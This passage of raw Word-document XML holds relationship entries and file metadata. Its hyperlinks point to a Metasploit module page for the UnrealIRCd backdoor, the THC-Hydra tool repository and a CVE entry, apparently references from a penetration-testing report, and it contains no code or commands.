TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.rapid7.com/db/modules/exploit/unix/irc/unreal_ircd_3281_backdoor"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ilehippo.com/download_vmware-workstation-player/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/vanhauser-thc/thc-hydra" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2311" TargetMode="External"/><Relationship Id="rId3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238</TotalTime>
  <Pages>14</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Grigaliūnas Šarūnas</cp:lastModifiedBy>
  <cp:revision>245</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-03-19T06:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-03-24T08:40:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>